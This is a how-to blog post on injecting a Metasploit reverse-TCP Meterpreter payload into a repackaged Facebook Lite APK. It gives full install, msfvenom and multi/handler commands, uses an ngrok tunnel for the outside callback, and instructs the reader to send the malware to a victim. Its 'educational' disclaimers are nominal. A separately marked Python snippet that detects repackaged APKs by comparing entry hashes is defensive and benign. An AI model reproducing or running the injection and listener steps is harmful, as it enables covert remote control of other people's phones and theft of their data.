How to inject Payload into APK in 10 minutes Using Metasploit (Gaining Access to Android)

A guide to gaining access to most Android devices (ethically) by sending an APK file


WARNING !

  • DO NOT USE THIS METHOD FOR ANY ILLEGAL ACCESS (THAT CAN PUT U IN JAIL).
  • THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.
  • I’M NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITY YOU DO
  • YOU MUST HAVE WRITTEN PERMISSION TO USE IT ON ANYONE
  • USE IT AT UR OWN RISK

^READ THE WARNING BEFORE U CONTINUE^


WHAT WILL WE NEED

We will need

  • Metasploit (of course)
  • apktool
  • default-jdk
  • default-jre
  • zipalign
  • THE APK FILE THAT THE PAYLOAD WILL BE INJECTED INTO
  • Ngrok (if u want to use the apk outside the local network)

INSTALL EVERYTHING

We will simply run this command in the terminal to install everything:

sudo apt update && sudo apt upgrade -y && sudo apt install metasploit-framework apktool default-jdk default-jre zipalign -y

If you want to use the APK outside the local network, use ngrok (if you don't know how to set it up, I've got u covered: I wrote a post about that HERE).

INJECTING PAYLOAD INTO APK

After installing everything, it's time to create our malware.

First we will download the APK we want from the internet (e.g. APKPURE).

In this example I will take Facebook Lite and rename it to fb-lite.apk.

First I will start up Ngrok using:

./ngrok tcp 4444

It gave me a host and a port, let's say for example:

  • the hostname is : tcp://1.tcp.ngrok.io
  • the port is : 10853

Don't CLOSE Ngrok

Note that we can also use our local IP (we can get it by typing the command ifconfig in the terminal and using the inet address that isn't 127.0.0.1 or 0.0.0.0; it will likely look like 192.168.1.1).

Now we have our APK (fb-lite.apk), our host IP (tcp://1.tcp.ngrok.io) and our port (10853), and we want to save the malware to a file named fb-malware.apk.

We will type in the terminal:

sudo msfvenom -x fb-lite.apk -p android/meterpreter/reverse_tcp LHOST=tcp://1.tcp.ngrok.io LPORT=10853 -o fb-malware.apk

Now wait about five minutes...

Now we have our malware; go send it to the victim (myself in this case).

Now let's set up a listener using Metasploit.

Open the terminal and type these commands one by one:

msfconsole
banner
use /multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

Now we wait until the victim installs and opens the app, and now we are in

and u now have the access u wanted
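
From the defender's side, a rebuilt APK such as fb-malware.apk no longer matches the publisher's original entry for entry. The following is an added example, not code from the original post: it compares a reference APK with a suspect copy by hashing each archive entry, and the function names and the two in-memory sample archives are constructed for illustration.

```python
import hashlib
import io
import zipfile

SIG_EXT = ("RSA", "DSA", "EC", "SF", "MF")  # v1 (JAR) signature file types

def entry_digests(apk_bytes):
    """Map each file entry in the APK (a ZIP archive) to its SHA-256."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return {i.filename: hashlib.sha256(z.read(i)).hexdigest()
                for i in z.infolist() if not i.is_dir()}

def diff_apk(reference, suspect):
    """Report entries added, removed or changed relative to the reference."""
    ref, sus = entry_digests(reference), entry_digests(suspect)
    report = {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "changed": sorted(n for n in set(ref) & set(sus) if ref[n] != sus[n]),
    }
    touched = report["added"] + report["changed"] + report["removed"]
    # Injected code shows up as a different manifest and/or classes*.dex.
    report["code_or_manifest_changed"] = any(
        n == "AndroidManifest.xml"
        or (n.startswith("classes") and n.endswith(".dex")) for n in touched)
    # A rebuild cannot reuse the publisher's key, so v1 signature files differ.
    report["signature_files_changed"] = any(
        n.startswith("META-INF/") and n.rsplit(".", 1)[-1] in SIG_EXT
        for n in touched)
    return report

def build_sample(entries):
    """Build a small constructed stand-in for an APK (not real APK contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()

ORIGINAL = build_sample({
    "AndroidManifest.xml": b"manifest-v1", "classes.dex": b"dex-v1",
    "res/icon.png": b"png", "META-INF/CERT.RSA": b"publisher-cert",
    "META-INF/MANIFEST.MF": b"mf-v1"})
REPACKAGED = build_sample({
    "AndroidManifest.xml": b"manifest-v1+more", "classes.dex": b"dex-v1+more",
    "res/icon.png": b"png", "META-INF/SIGNFILE.RSA": b"other-cert",
    "META-INF/MANIFEST.MF": b"mf-v2"})
if __name__ == "__main__":
    print(diff_apk(ORIGINAL, REPACKAGED))
```

On real files, read both APKs as bytes and pass them to diff_apk. Entry hashes complement, and do not replace, checking the signing certificate with a tool such as apksigner.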

If it worked, leave me a comment below. I hope I make a difference in somebody's life.

Stay in touch for the automated way without having to enter any command ^^ I will put its link here when it's live.

bye
